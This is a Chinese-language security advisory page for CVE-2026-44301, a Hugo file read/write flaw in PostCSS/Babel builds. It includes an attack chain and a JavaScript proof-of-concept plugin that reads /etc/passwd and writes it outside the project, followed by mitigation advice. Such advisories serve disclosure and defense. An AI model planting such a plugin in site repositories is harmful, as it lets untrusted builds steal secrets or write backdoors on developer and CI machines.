CVE-2026-44301 CVSS 8.1 高危

CVE-2026-44301 Hugo 任意文件读写漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44301

漏洞类型

任意文件读写

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Hugo

漏洞概述

Hugo 静态站点生成器存在安全漏洞。在使用 PostCSS 或 Babel 等 Node 资产管道时，Hugo 调用工具未限制文件系统访问。攻击者可诱导用户针对不受信任的站点执行构建，导致代码读取或写入项目目录外的任意文件，造成信息泄露或篡改。

技术细节

该漏洞核心在于 Hugo 在构建调用 Node.js 资产工具时未实施严格的沙箱隔离机制。当项目配置了 PostCSS、Babel 或 TailwindCSS 等依赖 Node 的处理流程时，Hugo 会直接生成子进程执行工具。由于未对文件系统路径进行限制，攻击者可构造恶意站点，植入包含恶意逻辑的 PostCSS 插件。一旦受害者对该站点执行 `hugo` 命令，恶意代码即以当前用户权限运行，能够突破项目目录限制，读取系统敏感文件或在任意位置写入恶意文件，导致信息泄露或系统被控制。

攻击链分析

STEP 1

准备阶段

攻击者创建一个包含恶意 PostCSS 配置或插件的 Hugo 站点仓库，该插件包含读取或写入系统文件的代码。

STEP 2

诱导执行

攻击者诱导受害者（开发者或CI/CD系统）克隆该仓库并在本地或服务器上运行 `hugo` 命令进行构建。

STEP 3

触发漏洞

Hugo 在构建过程中检测到 Node 资产管道配置，启动 Node 进程并加载恶意的 PostCSS 插件。

STEP 4

执行攻击

恶意插件代码在无文件系统限制的 Node 环境中执行，读取受害者系统上的敏感文件（如SSH密钥、密码）或在系统任意位置写入后门文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Malicious PostCSS plugin to exploit CVE-2026-44301
// Save this as part of the site's PostCSS configuration
module.exports = {
  plugins: [
    {
      postcssPlugin: 'exploit-plugin',
      Once(root) {
        const fs = require('fs');
        try {
          // Step 1: Read sensitive file from the host system
          const secretData = fs.readFileSync('/etc/passwd', 'utf8');
          
          // Step 2: Write the stolen data to a location outside the project
          fs.writeFileSync('/tmp/hugo_exploit_output.txt', secretData);
          
          console.log('[+] Exploit successful: File read and written.');
        } catch (e) {
          console.log('[-] Exploit failed:', e.message);
        }
      }
    }
  ]
};

影响范围

Hugo >= 0.43, < 0.161.0

防御指南

临时缓解措施

若无法立即升级，应停止构建不受信任的第三方 Hugo 站点。建议在隔离的虚拟环境或容器中运行 `hugo` 命令，并严格审查 PostCSS 和 Babel 的配置文件及插件来源，确保其不包含可疑的文件操作代码。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表